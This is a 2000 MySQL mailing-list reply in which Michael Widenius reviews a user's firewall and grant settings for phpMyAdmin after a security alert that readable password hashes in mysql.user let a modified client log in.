From: Michael Widenius Date: August 27 2000 10:09pm Subject: Re: Security alert: phpmyadmin List-Archive: http://lists.mysql.com/mysql/49054 Message-Id: <14761.37244.521372.573235@narttu.mysql.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Hi! >>>>> "Van" == Van writes: Van> Michael Widenius wrote: >> >> Hi! >> >> It has come to our attention that to use phpmyadmin one should set >> up MySQL to allow read on all columns in the mysql.user table. >> >> This is however very dangerous as if one knows the context of the >> password field in the above table, one can easily make a modified >> client that uses this to connect to the MySQL server. >> >> The encrypted password is the real password in MySQL; The password is >> only encrypted to not let one guess your real password; It was >> however never meant to be made readable to all! Unfortunately we Van> Monty: Van> Thanks for the heads up. Should it matter that someone could make a modified Van> client for this user if the following are in place? Van> 1. Firewall on MySQL port to DENY all but trusted hosts; Van> 2. No grants for this user except localhost; Van> 3. Only grant is select on mysql.user for the user in PHPMyAdmin. Van> I would think not, but, if you have additional concerns, I'd be interested in Van> reviewing them. Looks ok to me, assuming a user with the password for phpmyadmin can't get access to the 'trusted' hosts and the normal phpmyadmin users is someone you can trust. Regards, Monty